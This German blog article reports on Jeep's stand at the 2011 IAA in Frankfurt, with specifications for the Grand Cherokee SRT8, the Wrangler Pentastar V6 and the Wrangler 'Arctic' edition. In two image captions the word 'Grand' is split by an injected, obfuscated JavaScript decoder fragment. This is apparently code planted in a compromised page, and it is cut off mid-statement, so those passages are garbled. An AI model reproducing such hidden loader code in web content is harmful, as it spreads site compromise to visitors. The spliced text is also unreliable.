Jeep auf der IAA

14. September 2011 | Von Redaktion | Kategorie: Produktneuheiten, Transport

[Frankfurt a.M. (GER), 30-08-2011]. Gleich vier Vorschauen präsentiert Jeep® dem europäischen Publikum auf einer der weltweit wichtigsten Automobilmessen. Zu den Stars zählt die High-Performance-Variante SRT8 des luxuriösen Topmodells Grand Cherokee. Das Hochleistungs-SUV treibt ein vollständig neu entwickelter, 346 kW (470 PS) starker 6,4 Liter-HEMI®-V8-Motor an, zu den optischen Erkennungsmerkmalen des Grand Cherokee SRT8 auf der IAA zählen eine exklusive Außenlackierung in Rot und ein rotes Lederinterieur. Der neue Grand Cherokee SRT8 ist der stärkste und schnellste Jeep aller Zeiten, ausgestattet mit dem Potenzial und dem Charakter eines authentischen Super-Cars.

Feiert seine Europapremiere auf der IAA 2011: Die neue High-Performance-Variante Jeep Gr<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Cherokee SRT8 (Foto: Jeep)." width="600" height="400" />

Zusammen mit dem neu entwickelten, 209 kW (284) PS starken 3,6 Liter-V6-Pentastar-Motor, der 2012 das Antriebsprogramm der in punkto Straßenkomfort weiterentwickelten Modelle Jeep Wrangler und Jeep Wrangler Unlimited erweitert, präsentiert die US-Traditionsmarke das neue Editionsmodell Jeep Wrangler „Arctic“ – und vergrößert damit die Modellvielfalt des Kult-Offroaders um eine weitere, werkseitig individualisierte Variante.

Ein weiterer Blickfang auf dem Jeep-Messestand ist die Studie Jeep Grand Cherokee „Interior Concept“, die das Designpotenzial des Markenflaggschiffs eindrucksvoll darstellt. So verleiht das Exterieur in „White Gold“ Kultiviertheit und einen stilvollen Charakter, während sich das geräumige, mit blauem Softleder ausgestattete Interieur als exklusiver Wohnraum präsentiert und eine ganz neue Art von Eleganz vermittelt.

Zu den Jeep-Neuheiten in Frankfurt zählt auch eine FlexFuel-Variante des 3,6-Liter-Pentastar-Triebwerks mit 210 kW (286 PS), für den Betrieb mit Benzin und alternativ mit dem Bioethanol-Kraftstoff E85. Auch diese Antriebsvariante wird 2012 das europäische Verkaufsprogramm des Jeep Grand Cherokee um eine betont umweltfreundliche Ausführung erweitern.

„The Power of a Line“ lautet das Thema des Jeep-Standes auf der IAA 2011 in Frankfurt. „Line“ steht für „Herkunft“, symbolisiert die legendäre Markenhistorie und spannt einen Bogen über siebzig Jahre von den ersten 4x4-Fahrzeugen aus dem Jahr 1941 bis heute und erzählt von der kontinuierlichen Evolution einer Kultmarke, die für authentische Offroadfahrzeuge steht – und die immer in der Lage war, sich selbst neu zu erfinden, ohne die Grundwerte ihrer DNA zu verlieren.

Jeep® Gr<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Cherokee SRT8: stärkster Jeep aller Zeiten (Foto: Jeep)." width="400" height="600" />

Die 760 Quadratmeter große Ausstellungsfläche in der Messehalle 6 zeigt verschiedene Szenarien und Geländeformen, in denen Jeep-Modelle ihre Stärken ausspielen können – Onroad-Performance in der Stadt und legendäre 4x4-Fähigkeit auf extremen Offroadpisten. Display-Säulen sind als dynamische Elemente ausgeführt und interagieren über LED-Flächen mit einem Wandbildschirm im Hintergrund, auf dem emotionale Videos die wichtigsten Merkmale der einzelnen Jeep-Modelle darstellen. Auch das Farbschema ist sorgfältig ausgesucht: Weiß, Grau und Beige im Bodenbereich rund um die Fahrzeuge markieren die Grenzen zwischen Sanddünen, Schneeverwehungen und Stadtboulevards.

Ein Merchandising-Bereich rundet das Jeep-Feeling mit repräsentativen Vitrinen und der neuesten Lifestyle-Kollektion der Marke ab.

Jeep Grand Cherokee SRT8

Die neue Generation des Jeep Grand Cherokee SRT8 erlebt auf der IAA 2011 in Frankfurt ihr Europadebüt und verbindet legendäre Fahreigenschaften mit faszinierender Motorsporttechnologie. Ein vollständig neu entwickelter 6,4 Liter-HEMI-V8-Motor mit einer Leistung von 346 kW/470 PS und einem maximalen Drehmoment von 630 Newtonmetern generiert mit einer Beschleunigung von 4,8 Sekunden von Null auf 100 Kilometer pro Stunde, einer Höchstgeschwindigkeit von 255 Kilometern pro Stunde und einem Bremsweg von 35 Metern (100-0 km/h) Fahrdynamikwerte der Spitzenklasse.

Dank eines aktiven, über die elektronische Selec-Trac-Vierradantriebs-Steuerung geregelten Feder-Dämpfer-Systems ist der Grand Cherokee SRT8 auch in puncto Fahreigenschaften und Handling der beste Jeep aller Zeiten. Ein aktive, ventilgesteuerte Abgasanlage ermöglicht zudem den Einsatz Kraftstoff sparender Technologien, die eine 13-prozentige Reduzierung des Autobahn-Kraftstoffverbrauchs und Reichweiten von bis zu 720 Kilometern mit einer Tankfüllung ermöglichen. Das abgesenkte Karosserieprofil, der vom Motorsport inspirierte Innenraum und das exklusive SRT-Lenkrad mit integrierten Schaltwippen unterstreichen den leistungsbetonten Auftritt des Jeep-Flaggschiffs und seine Fähigkeiten auf Straße und Rennstrecke. Erhältlich ist der Jeep Grand Cherokee SRT8 bei den europäischen Vertragshändlern im ersten Quartal 2012.

Jeep Wrangler 3.6 V6 Pentastar

Um eine Neuentwicklung handelt es sich auch bei dem in Frankfurt vorgestellten 3,6 Liter-Pentastar-V6-Benzinmotor, der 2012 das Antriebsspektrum des Jeep Wrangler und Jeep Wrangler Unlimited erweitert. Der Wrangler, Gallionsfigur der Marke Jeep, wird wegen seiner außergewöhnlichen Geländegängigkeit und seines einzigartigen Charakters weltweit geschätzt. Sein neuer 3.6 V6-Motor leistet 209 kW/284 PS, entwickelt ein maximales Drehmoment von 342 Newtonmetern und ist mit einem in Schaltqualität und Leistungsverhalten optimierten Fünfgang-Automatikgetriebe kombiniert. Das bewährte Sechsgang-Schaltgetriebe ist für diese Motorvariante ebenfalls weiter erhältlich.

Der Jeep Wrangler verbindet einen optimierten Akustikkomfort mit nochmals verbessertem Fahrkomfort auf der Straße. Der neue Benziner stellt damit eine attraktive Alternative zur Turbodieselvariante 2.8 CRD dar, die – ebenfalls wahlweise mit Fünfgang-Automatikgetriebe oder Sechsgang-Schaltgetriebe – auf dem europäischen Mark bereits erhältlich ist. Die Markteinführung des Jeep Wrangler mit Pentastar-Benzintriebwerk in Europa erfolgt ab November 2011, verfügbar sind die Modelle in den Ausstattungen Sport, Sahara und Rubicon.

Jeep Wrangler „Arctic“

Das neue Editionsmodell „Arctic“ in Frankfurt würdigt die legendäre 4x4-Performance des Jeep Wrangler – zählt doch die Arktis zu den besonders anspruchsvollen Geländeformen, die dem Jeep Wrangler dank seiner außergewöhnlichen Offroadfähigkeiten zugänglich sind. Wie beim Modell Sahara ist auch hier das Namen spendende Design auf den ersten Blick erkennbar: Exklusive Stylingelemente wie „Arctic“-Logos und Aufkleber erinnern an den mythischen Schneemenschen Jeti, der nach Erzählungen und Sagen in der unberührten Natur des hohen Nordens lebt.

Weitere optische Kennzeichen des Editionsmodells sind schwarze Räder im17-Zoll-Format, Originalzubehör des Spezialisten Mopar ® und ein exklusives Interieur mit besonderen Farben und Designelementen. Als mögliche Antriebsvarianten bieten sich der neue 3,6 Liter V6-Benzinmotor mit Fünfgang-Automatikgetriebe und die Dieselversion 2.8 CRD wahlweise mit Fünfgang-Automatikgetriebe oder Sechsgang-Schaltgetriebe an. Der Jeep Wrangler Arctic steht in den Karosserievarianten Jeep Wrangler und Jeep Wrangler Unlimited zur Verfügung, die Markteinführung in Europa erfolgt im ersten Quartal 2012.

Jeep Grand Cherokee Interior Concept

Mit einem exklusiven Lederinterieur in Blau sowie einer Vielzahl weiterer aufwändiger Details repräsentiert die Studie Jeep Grand Cherokee Interior Concept einen neuen Designansatz. Zielrichtung: First-Class-Ambiente, Stil und hohe Wertigkeit. Damit kombiniert das Jeep-Flaggschiff den Fahrkomfort einer hochwertigen Limousine mit fortschrittlicher Technologie zu einem faszinierenden Gesamtpaket.

Die Marke Jeep

Jeep steht für Freiheit, Abenteuer, Authentizität, Leidenschaft und Einzigartigkeit – fünf Kernwerte einer Marken-DNA, die sich im Design ebenso niederschlagen wie in der Funktionalität, Verarbeitung und führenden Fahreigenschaften im Gelände. Aufbauend auf einer 70-jährigen Markentradition verkörpert Jeep authentische SUV-Fahrzeuge für Menschen, die das Außergewöhnliche suchen, im extremen Gelände wie in der Stadt. Jeep ist eine Einladung, das Leben in vollen Zügen zu leben – mit Fahrzeugen, die Vertrauen vermitteln und die Sicherheit, jede noch so schwierige Reise zu bewältigen.

Als Marke mit außergewöhnlicher Tradition war Jeep war schon immer in der Lage, sich selbst neu zu erfinden und immer wieder innovative, charakterstarke Modelle zu entwickeln, die Maßstäbe für eine ganze Fahrzeugklasse setzen.

Für das Unternehmen ist 2011 ein besonderes Jahr, markiert es doch zum 70. Markenjubiläum mit vier Europapremieren eine Erneuerung der Modellpalette – der aktualisierten Ikone Jeep Wrangler, erstmals verwendeter Stopp/Start-Technologie, einem neuen, ebenso leistungsstarken wie sparsamen 3,0 Liter-Multijet II-Dieselmotor für das Flaggschiff Grand Cherokee und dem kompakten Markengefährten Jeep Compass, der die gleiche unverwechselbare Designsprache seines großen Bruders spricht.

Socialize:
  • Twitter
  • del.icio.us
  • Google Bookmarks
  • Digg
  • Facebook
  • FriendFeed
  • LinkArena
  • MisterWong.DE
  • NewsVine
  • Yigg
  • StumbleUpon
  • Yahoo! Bookmarks
  • MySpace
  • Netvibes
  • Technorati
  • RSS
  • Print
Tags:
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=63498

Hier klicken, um einen Kommentar zu schreiben